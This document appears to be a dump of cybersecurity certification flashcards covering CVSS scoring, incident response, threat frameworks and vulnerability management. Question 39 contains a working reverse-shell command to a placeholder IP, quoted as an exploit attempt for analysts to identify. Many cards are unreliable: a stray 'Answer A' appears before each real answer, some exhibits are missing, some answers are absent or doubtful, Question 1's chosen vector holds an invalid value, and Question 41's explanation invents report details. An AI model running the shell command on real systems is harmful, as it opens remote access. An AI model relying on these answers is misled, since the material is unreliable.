examtopics.com Flashcards

Question 1

Q

A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?

A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L
B. CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L
C. CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H
D. CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H

Answer

A

A. CVSS:31/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:K/A:L

AV = Attack Vector (Network, Adjacent, Local, Physical)
AC = Attack Complexity (Low, High)
PR = Privileges Required (None, Low, High)
UI = User Interaction (None, Required)
S = Scope (Unchanged, Changed)
C = Confidentiality (None, Low, High)
I = Integrity (None, Low, High)
A = Availability (None, Low, High)

Question 2

Q

Which of the following tools would work best to prevent the exposure of PII outside of an organization?

A. PAM.
B. IDS.
C. PKI.
D. DLP.

Answer

A

D. DLP.

Data loss prevention (DLP) products automate the discovery and classification of data types and enforce rules so that data is not viewed or transferred without a proper authorization.

Data loss prevention (DLP) is a tool that can prevent the exposure of PII outside of an organization by monitoring, detecting, and blocking sensitive data in motion,
in use, or at rest.

Question 3

Q

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

Which of the following tuning recommendations should the security analyst share?

A. Set an HttpOnly flag to force communication by HTTPS
B. Block requests without an X-Frame-Options header
C. Configure an Access-Control-Allow-Origin header to authorized domains
D. Disable the cross-origin resource sharing header

Answer

A

B. Block requests without an X-Frame-Options header

The output shows that the web application is vulnerable to clickjacking attacks, which allow an attacker to overlay a hidden frame on top of a legitimate page and trick users into clicking on malicious links. Blocking requests without an X-Frame-Options header can prevent this attack by instructing the browser to not display the page within a frame.

Question 4

Q

Which of the following items should be included in a vulnerability scan report? (Choose two.)

A. Lessons learned.
B. Service-level agreement.
C. Playbook.
D. Affected hosts.
E. Risk score.
F. Education plan.

Answer

A

D. Affected hosts.
E. Risk score.

A vulnerability report should detail identified vulnerabilities, such as missing patches, incorrect configuration settings, and weak passwords, and include the following:

Details regarding the type of vulnerability
The number of instances
The affected systems
The risk levels
Recommendations

Question 5

Q

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?

A. A mean time to remediate of 30 days.
B. A mean time to detect of 45 days.
C. A mean time to respond of 15 days.
D. Third-party application testing.

Answer

A

A. A mean time to remediate of 30 days.

Question 6

Q

A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script:

Which of the following scripting languages was used in the script?

A. PowerShell.
B. Ruby.
C. Python.
D. Shell script.

Answer

A

A. PowerShell.

The script uses PowerShell syntax, such as cmdlets, parameters, variables, and comments. PowerShell is a scripting language that can be used to automate tasks and manage systems.

Question 7

Q

A company’s user accounts have been compromised. Users are also reporting that the company’s internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?

A. There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access.
B. An on-path attack is being performed by someone with internal access that forces users into port 80.
C. The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80.
D. An error was caused by BGP due to new rules applied over the company’s internal routers.

Answer

A

B. An on-path attack is being performed by someone with internal access that forces users into port 80.

An on-path attack is a type of man-in-the-middle attack where an attacker intercepts and modifies network traffic between two parties. In this case, someone with internal access may be performing an on-path attack by forcing users into port 80, which is used for HTTP communication, instead of port 443, which is used for HTTPS communication. This would allow the attacker to compromise the user accounts and access the company’s internal portal.

The fact that the company’s internal portal is sometimes accessible through HTTP (port 80) and other times through HTTPS (port 443) suggests that someone with internal access is actively manipulating the network traffic.

An issue with the SSL certificate (Option A) would generally result in HTTPS not working at all, rather than it being intermittently accessible.

A web server unable to handle an increasing amount of HTTPS requests (Option C) would likely result in performance issues or server errors, but it wouldn’t selectively redirect users to HTTP.

BGP (Border Gateway Protocol) is used for routing between autonomous systems on the internet, and it generally would not cause the internal portal to switch between HTTP and HTTPS. It is more relevant to external internet routing.

Question 8

Q

A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:
Security Policy 1006: Vulnerability Management
1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.
2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.
3. The Company shall prioritize patching of publicly available systems and services over patching of internally available system.
According to the security policy, which of the following vulnerabilities should be the highest priority to patch?

A. Name: THOR.HAMMER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Internal System
B. Name: CAP.SHIELD -
CVSS 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System
C. Name: LOKI.DAGGER -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
External System
D. Name: THANOS.GAUNTLET -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Internal System

Answer

A

B. Name: CAP.SHIELD -
CVSS 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System

Question 9

Q

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

A. Business continuity plan.
B. Vulnerability management plan.
C. Disaster recovery plan.
D. Asset management plan.

Answer

A

A. Business continuity plan.

Disaster recovery describes the efforts taken to restore infected systems to a safe operating state. By comparison, business continuity describes the work the organization does to keep running, manage the legal ramification of the event, keep staff employed, work with insurance companies, provide internal and external communications regarding the event and its ramifications, investigate the root cause, develop plans to prevent reoccurrence, and much more.

Question 10

Q

The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?

A. Deploy a CASB and enable policy enforcement.
B. Configure MFA with strict access.
C. Deploy an API gateway.
D. Enable SSO to the cloud applications.

Answer

A

A. Deploy a CASB and enable policy enforcement.

A Cloud Access Security Broker (CASB) is a specialized security solution designed to provide visibility and control over the use of cloud applications and services within an organization. It helps organizations identify and manage shadow IT by monitoring and controlling access to cloud applications.

Question 11

Q

An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?

A. CDN.
B. Vulnerability scanner.
C. DNS.
D. Web server.

Answer

A

C. DNS.

DNS Logs: DDoS attacks often involve overwhelming the DNS infrastructure to disrupt normal internet services. By reviewing DNS logs, the incident response team can identify abnormal traffic patterns, unusual queries, and potential signs of a DDoS attack targeting the organization’s DNS servers. Analyzing DNS logs can help pinpoint the attack source, the type of attack, and the affected domains.

Question 12

Q

A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?

A. Weaponization.
B. Reconnaissance.
C. Delivery.
D. Exploitation.

Answer

A

D. Exploitation.

The Cyber Kill Chain is a framework that describes the stages of a cyberattack from reconnaissance to actions on objectives. The exploitation stage is where attackers take advantage of the vulnerabilities they have discovered in previous stages to further infiltrate a target’s network and achieve their objectives. In this case, the malicious actor has gained access to an internal network by means of social engineering and does not want to lose access in order to continue the attack. This indicates that the actor is in the exploitation stage of the Cyber Kill Chain. Official References: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

Question 13

Q

An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?

A. Exploitation.
B. Reconnaissance.
C. Command and control.
D. Actions on objectives.

Answer

A

B. Reconnaissance.

Question 14

Q

An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two.)

A. Beaconing.
B. Domain Name System hijacking.
C. Social engineering attack.
D. On-path attack.
E. Obfuscated links.
F. Address Resolution Protocol poisoning.

Answer

A

C. Social engineering attack.
E. Obfuscated links.

Question 15

Q

During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase?

A. Conduct regular red team exercises over the application in production.
B. Ensure that all implemented coding libraries are regularly checked.
C. Use application security scanning as part of the pipeline for the CI/CD flow.
D. Implement proper input validation for any data entry form.

Answer

A

C. Use application security scanning as part of the pipeline for the CI/CD flow.

Continuous Integration/Continuous Deployment (CI/CD) pipelines are an integral part of modern software development practices. By incorporating application security scanning into the CI/CD pipeline, vulnerabilities can be identified and addressed at various stages of development, including during the build and deployment processes.

Question 16

Q

An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?

A. Proprietary systems.
B. Legacy systems.
C. Unsupported operating systems.
D. Lack of maintenance windows.

Answer

A

A. Proprietary systems.

Question 17

Q

The security team reviews a web server for XSS and runs the following Nmap scan:

Which of the following most accurately describes the result of the scan?

A. An output of characters > and “ as the parameters used m the attempt.
B. The vulnerable parameter ID http://172.31.15.2/1.php?id-2 and unfiltered characters returned.
C. The vulnerable parameter and unfiltered or encoded characters passed > and “ as unsafe.
D. The vulnerable parameter and characters > and “ with a reflected XSS attempt.

Answer

A

D. The vulnerable parameter and characters > and “ with a reflected XSS attempt.

Question 18

Q

Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

A. Develop a call tree to inform impacted users.
B. Schedule a review with all teams to discuss what occurred.
C. Create an executive summary to update company leadership.
D. Review regulatory compliance with public relations for official notification.

Answer

A

B. Schedule a review with all teams to discuss what occurred.

One of the best actions to take after the conclusion of a security incident to improve incident response in the future is to schedule a review with all teams to discuss what occurred, what went well, what went wrong, and what can be improved. This review is also known as a lessons learned session or an after-action report. The purpose of this review is to identify the root causes of the incident, evaluate the effectiveness of the incident response process, document any gaps or weaknesses in the security controls, and recommend corrective actions or preventive measures for future incidents.

Question 19

Q

A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?

A. Code analysis.
B. Static analysis.
C. Reverse engineering.
D. Fuzzing.

Answer

A

C. Reverse engineering.

Reverse engineering describes deconstructing software and/or hardware to determine how it is crafted. Reverse engineering’s objective is to determine how much information can be extracted from delivered software. For example, reverse engineering can sometimes extract source code, identify software methods and languages used, developer comments, variable names and types, system and web calls, and many other things. An adversary can perform reverse engineering on a software patch to identify the vulnerabilities it is crafted to fix, or an analyst can perform reverse engineering on malware to determine how it operates.

Question 20

Q

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?

A. Hard disk.
B. Primary boot partition.
C. Malicious files.
D. Routing table.
E. Static IP address.

Answer

A

D. Routing table.

“Evidence capture prioritizes collection activities based on the order of volatility, initially focusing on highly volatile storage. The ISOC best practice guide to evidence collection and archiving, published as tools.ietf.org/html/rfc3227, sets out the general order as follows:

CPU registers and cache memory (including cache on disk controllers, GPUs, and so on)
Contents of system memory (RAM), including the following:
Routing table, ARP cache, process table, kernel statistics
Temporary file systems/swap space/virtual memory
Data on persistent mass storage devices (HDDs, SSDs, and flash memory devices)—including file system and free space
Remote logging and monitoring data
Physical configuration and network topology
Archival media”

Question 21

Q

Which of the following security operations tasks are ideal for automation?

A. Suspicious file analysis: Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder.

B. Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit.
Take mitigating actions in the firewall to block the behavior found in the logs. Follow up on any false positives that were caused by the block rules.

C. Security application user errors: Search the error logs for signs of users having trouble with the security application
Look up the user’s phone number - Call the user to help with any questions about using the application.

D. Email header analysis: Check the email header for a phishing confidence metric greater than or equal to five. Add the domain of sender to the block list. Move the email to quarantine.

Answer

A

B. Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit.
Take mitigating actions in the firewall to block the behavior found in the logs. Follow up on any false positives that were caused by the block rules.

Question 22

Q

An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?

A. PCI Security Standards Council.
B. Local law enforcement.
C. Federal law enforcement.
D. Card issuer.

Answer

A

D. Card issuer.

Question 23

Q

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?

A. Mean time to detect.
B. Number of exploits by tactic.
C. Alert volume.
D. Quantity of intrusion attempts.

Answer

A

A. Mean time to detect.

Question 24

Q

A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?

A. The current scanners should be migrated to the cloud.
B. Cloud-specific misconfigurations may not be detected by the current scanners.
C. Existing vulnerability scanners cannot scan IaaS systems.
D. Vulnerability scans on cloud environments should be performed from the cloud.

Answer

A

B. Cloud-specific misconfigurations may not be detected by the current scanners.

Cloud-specific misconfigurations are security issues that arise from improper or inadequate configuration of cloud resources, such as storage buckets, databases, virtual machines, or containers. Cloud-specific misconfigurations may not be detected by the current scanners that are designed for on-premises environments, as they may not have the visibility or access to the cloud resources or the cloud provider’s APIs. Therefore, one of the implications that should be considered on the new hybrid environment is that cloud-specific misconfigurations may not be detected by the current scanners.

Question 25

Q

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user’s workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?

A. Create a timeline of events detailing the date stamps, user account hostname and IP information associated with the activities.
B. Ensure that the case details do not reflect any user-identifiable information, password protect the evidence and restrict access to personnel related to the investigation.
C. Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation.
D. Notify the SOC manager for awareness after confirmation that the activity was intentional.

Answer

A

B. Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation.

Question 26

Q

Which of the following is the first step that should be performed when establishing a disaster recovery plan?

A. Agree on the goals and objectives of the plan.
B. Determine the site to be used during a disaster.
C. Demonstrate adherence to a standard disaster recovery process.
D. Identify applications to be run during a disaster.

Answer

A

A. Agree on the goals and objectives of the plan.

Question 27

Q

A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?

A. Testing.
B. Implementation.
C. Validation.
D. Rollback.

Answer

A

C. Validation.

Question 28

Q

The analyst reviews the following endpoint log entry:

Which of the following has occurred?

A. Registry change.
B. Rename computer.
C. New account introduced.
D. Privilege escalation.

Answer

A

C. New account introduced.

The endpoint log entry shows that a new account named “admin” has been created on a Windows system with a local group membership of “Administrators”. This indicates that a new account has been introduced on the system with administrative privileges. This could be a sign of malicious activity, such as privilege escalation or backdoor creation, by an attacker who has compromised the system.

Question 29

Q

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?

A. Data enrichment.
B. Security control plane.
C. Threat feed combination.
D. Single pane of glass.

Answer

A

D. Single pane of glass.

Question 30

Q

Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output:

Which of the following choices should the analyst look at first?

A. wh4dc-748gy.lan (192.168.86.152)
B. officerckuplayer.lan (192.168.86.22)
C. imaging.lan (192.168.86.150)
D. xlaptop.lan (192.168.86.249)
E. p4wnp1_aloa.lan (192.168.86.56)

Answer

A

E. p4wnp1_aloa.lan (192.168.86.56)

The analyst should look at p4wnp1_aloa.lan (192.168.86.56) first, as this is the most suspicious device on the network.
https://github.com/RoganDawes/P4wnP1_aloa

Question 31

Q

When starting an investigation, which of the following must be done first?

A. Notify law enforcement.
B. Secure the scene.
C. Seize all related evidence.
D. Interview the witnesses.

Answer

A

B. Secure the scene.

The first thing that must be done when starting an investigation is to secure the scene. Securing the scene involves isolating and protecting the area where the incident occurred, as well as any potential evidence or witnesses. Securing the scene can help prevent any tampering, contamination, or destruction of evidence, as well as any interference or obstruction of the investigation.

Question 32

Q

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?

A. The lead should review what is documented in the incident response policy or plan.
B. Management level members of the CSIRT should make that decision.
C. The lead has the authority to decide who to communicate with at any t me.
D. Subject matter experts on the team should communicate with others within the specified area of expertise.

Answer

A

A. The lead should review what is documented in the incident response policy or plan.

The incident response policy or plan is a document that defines the roles and responsibilities, procedures and processes, communication and escalation protocols, and reporting and documentation requirements for handling security incidents. The lead should review what is documented in the incident response policy or plan to determine who should be communicated with and when during a security incident, as well as what information should be shared and how. The incident response policy or plan should also be aligned with the organizational policies and legal obligations regarding incident notification and disclosure.

Question 33

Q

A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?

A. Firewall logs.
B. Indicators of compromise.
C. Risk assessment.
D. Access control lists.

Answer

A

C. Risk assessment.

Question 34

Q

An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?

A. Beaconing.
B. Cross-site scripting.
C. Buffer overflow.
D. PHP traversal.

Answer

A

A. Beaconing.

Question 35

Q

A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?

A. Change the display filter to ftp.active.port.
B. Change the display filter to tcp.port==20.
C. Change the display filter to ftp-data and follow the TCP streams.
D. Navigate to the File menu and select FTP from the Export objects option.

Answer

A

C. Change the display filter to ftp-data and follow the TCP streams.

By changing the display filter to “ftp-data” and then following the TCP streams, the analyst can access and view the entire data transfer, which includes the contents of the downloaded files. This method allows you to reconstruct and view the files being transferred over FTP.

Question 36

Q

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

A. SLA.
B. MOU.
C. NDA.
D. Limitation of liability.

Question 37

Q

Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?

A. Command and control.
B. Actions on objectives.
C. Exploitation.
D. Delivery.

Answer

A

A. Command and control.

Command and control (C2) is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 enables the adversary to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels. C2 allows the adversary to maintain persistence, exfiltrate data, execute commands, deliver payloads, or spread to other systems or networks.

Question 38

Q

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

A. External
B. Agent-based
C. Non-credentialed
D. Credentialed

Answer

A

B. Agent-based

Agent-based vulnerability scanning involves deploying scanning agents on the target systems. These agents perform the scanning locally on each system, reducing the need for extensive network traffic because the scanning is distributed. This approach is particularly well-suited for environments with dynamic IP addresses and remote workers because it doesn’t rely on centralized scanning servers or frequent network scans.

Question 39

Q

A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

Which of the following is being attempted?

A. RCE
B. Reverse shell
C. XSS
D. SQL injection

Answer

A

B. Reverse shell

A reverse shell is a type of shell access that allows a remote user to execute commands on a target system or network by reversing the normal direction of communication. A reverse shell is usually created by running a malicious script or program on the target system that connects back to the remote user’s system and opens a shell session. A reverse shell can bypass firewalls or other security controls that block incoming connections, as it uses an outgoing connection initiated by the target system. In this case, the security analyst has detected an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

This command is a shell script that creates a reverse shell connection from the target system to the remote user’s system at IP address 10.1.1.1 and port 4821 using UDP protocol.

Question 40

Q

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

A. Scope
B. Weaponization
C. CVSS
D. Asset value

Answer

A

B. Weaponization

Weaponization in the context of vulnerability assessment and the Common Vulnerability Scoring System (CVSS) refers to the development and availability of tools, exploits, or malware that can take advantage of a vulnerability. When a widely available exploit, such as one used to deliver ransomware, becomes accessible to attackers, it significantly increases the severity of the vulnerability. This is because the exploitability of the vulnerability is heightened, leading to a higher CVSS score.

Question 41

Q

An analyst is reviewing a vulnerability report for a server environment with the following entries:

Which of the following systems should be prioritized for patching first?

A. 10.101.27.98
B. 54.73.225.17
C. 54.74.110.26
D. 54.74.110.228

Answer

A

D. 54.74.110.228

The system that should be prioritized for patching first is 54.74.110.228, as it has the highest number and severity of vulnerabilities among the four systems listed in the vulnerability report. According to the report, this system has 12 vulnerabilities, with 8 critical, 3 high, and 1 medium severity ratings. The critical vulnerabilities include CVE-2019-0708 (BlueKeep), CVE-2019-1182 (DejaBlue), CVE-2017-0144 (EternalBlue), and CVE-2017-0145 (EternalRomance), which are all remote code execution vulnerabilities that can allow an attacker to compromise the system without any user interaction or authentication. These vulnerabilities pose a high
risk to the system and should be patched as soon as possible.

Question 42

Q

A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?

A. Credentialed network scanning
B. Passive scanning
C. Agent-based scanning
D. Dynamic scanning

Answer

A

C. Agent-based scanning

Question 43

Q

A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?

A. function x() { info=$(geoiplookup $1) && echo “$1 | $info” }
B. function x() { info=$(ping -c 1 $1 | awk -F “/” ’END{print $5}’) && echo “$1 | $info” }
C. function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F “.in-addr” ’{print $1} ‘).origin.asn.cymru.com TXT +short) && echo “$1 | $info” }
D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }

Answer

A

D. function x() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }

This shell function uses traceroute to trace the route packets take to reach the destination specified by $1. The -m 40 option specifies a maximum of 40 hops for the trace. The awk ‘END{print $1}’ part extracts the final hop from the traceroute output, and then the function echoes the destination and the info.

Question 44

Q

There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

A. Implement step-up authentication for administrators.
B. Improve employee training and awareness.
C. Increase password complexity standards.
D. Deploy mobile device management.

Answer

A

B. Improve employee training and awareness.

Question 45

Q

Which of the following is the best way to begin preparation for a report titled “What We Learned” regarding a recent incident involving a cybersecurity breach?

A. Determine the sophistication of the audience that the report is meant for.
B. Include references and sources of information on the first page.
C. Include a table of contents outlining the entire report.
D. Decide on the color scheme that will effectively communicate the metrics.

Answer

A

A. Determine the sophistication of the audience that the report is meant for.

Question 46

Q

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?

A. Upload the binary to an air gapped sandbox for analysis.
B. Send the binaries to the antivirus vendor.
C. Execute the binaries on an environment with internet connectivity.
D. Query the file hashes using VirusTotal.

Answer

A

A. Upload the binary to an air gapped sandbox for analysis.

Question 47

Q

Which of the following would help to minimize human engagement and aid in process improvement in security operations?

A. OSSTMM
B. SIEM
C. SOAR
D. OWASP

Answer

A

C. SOAR

SOAR stands for security orchestration, automation, and response, which is a term that describes a set of tools, technologies, or platforms that can help streamline, standardize, and automate security operations and incident response processes and tasks. SOAR can help minimize human engagement and aid in process improvement in security operations by reducing manual work, human errors, response time, or complexity. SOAR can also help enhance collaboration, coordination, efficiency, or effectiveness of security operations and incident response teams.

Question 48

Q

After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?

A. Avoid
B. Transfer
C. Accept
D. Mitigate

Question 49

Q

Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

A. Identify any improvements or changes in the incident response plan or procedures.
B. Determine if an internal mistake was made and who did it so they do not repeat the error.
C. Present all legal evidence collected and turn it over to iaw enforcement.
D. Discuss the financial impact of the incident to determine if security controls are well spent.

Answer

A

A. Identify any improvements or changes in the incident response plan or procedures.

This helps in strengthening the organization’s security posture and ensuring a more effective response in the future.

Question 50

Q

The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?

A. Single pane of glass
B. Single sign-on
C. Data enrichment
D. Deduplication

Answer

A

A. Single pane of glass

A single pane of glass provides a unified dashboard and workflow for managing multiple feeds, data sources, and tools within one interface. This allows streamlining threat intel from disparate portals into one centralized view for improved efficiency and visibility.

Question 51

Q

Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?

A. MITRE ATT&CK
B. Cyber Kill Cham
C. OWASP
D. STIX/TAXII

Answer

A

A. MITRE ATT&CK

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a widely used framework that provides a comprehensive matrix of known Tactics, Techniques, and Procedures (TTPs) used by various adversaries. It allows security analysts to compare and map the TTPs observed in their environment to those associated with known threat actors and groups. By using ATT&CK, analysts can gain insights into which adversaries may be responsible for specific incidents based on their TTPs, aiding in threat intelligence analysis and incident response.

Question 52

Q

An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?

A. Eradication
B. Recovery
C. Containment
D. Preparation

Answer

A

A. Eradication

Eradication involves the process of identifying and removing the root cause or vulnerability that led to the incident. In this case, the analyst has isolated the vulnerability and is actively removing it from the system. This step is crucial to prevent further exploitation of the same vulnerability and to ensure the incident does not recur.

Question 53

Q

Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer’s customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?

A. Isolate Joe’s PC from the network.
B. Reimage the PC based on standard operating procedures.
C. Initiate a remote wipe of Joe’s PC using mobile device management.
D. Perform no action until HR or legal counsel advises on next steps.

Answer

A

D. Perform no action until HR or legal counsel advises on next steps.

Before any technical actions are taken, it is crucial to involve HR and legal counsel to assess the situation, understand the legal implications of Joe’s actions, and determine the appropriate course. This ensures that any response is in compliance with employment laws and company policies.

Question 54

Q

The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?

A. Reduce the administrator and privileged access accounts.
B. Employ a network-based IDS.
C. Conduct thorough incident response.
D. Enable SSO to enterprise applications.

Answer

A

A. Reduce the administrator and privileged access accounts.

Zero trust is a security framework that assumes that threats exist both inside and outside the network. It emphasizes the principle of “least privilege,” which means that users and systems should only have the minimum level of access necessary to perform their tasks.

Question 55

Q

During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?

A. Clone the virtual server for forensic analysis.
B. Log into the affected server and begin analysis of the logs.
C. Restore from the last known-good backup to confirm there was no loss of connectivity.
D. Shut down the affected server immediately.

Answer

A

A. Clone the virtual server for forensic analysis.

Cloning the virtual server allows the analyst to capture a snapshot of the system as it is, including all current data, configurations, and state. This cloned version can be analyzed in detail without affecting the integrity of the original server, which is crucial for any potential legal proceedings and for understanding the scope and details of the attack.

Question 56

Q

A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?

A. C2 beaconing activity.
B. Data exfiltration.
C. Anomalous activity on unexpected ports.
D. Network host IP address scanning.
E. A rogue network device.

Answer

A

A. C2 beaconing activity.

The most likely explanation for this traffic pattern is C2 beaconing activity. C2 stands for command and control, which is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 beaconing activity is a type of network traffic that indicates a compromised system is sending periodic messages or signals to an attacker’s system using various protocols, such as HTTP(S), DNS, ICMP, or UDP. C2 beaconing activity can enable the attacker to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels.

Question 57

Q

New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?

A. Human resources must email a copy of a user agreement to all new employees.
B. Supervisors must get verbal confirmation from new employees indicating they have read the user agreement.
C. All new employees must take a test about the company security policy during the onboardmg process.
D. All new employees must sign a user agreement to acknowledge the company security policy.

Answer

A

D. All new employees must sign a user agreement to acknowledge the company security policy.

Requiring new employees to sign a user agreement is a common and effective practice in organizations. It ensures that employees have acknowledged and agreed to adhere to the company’s security policies, including the prohibition of personal devices.

Question 58

Q

An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign?

A. Information sharing organization.
B. Blogs/forums.
C. Cybersecurity incident response team.
D. Deep/dark web.

Answer

A

A. Information sharing organization.

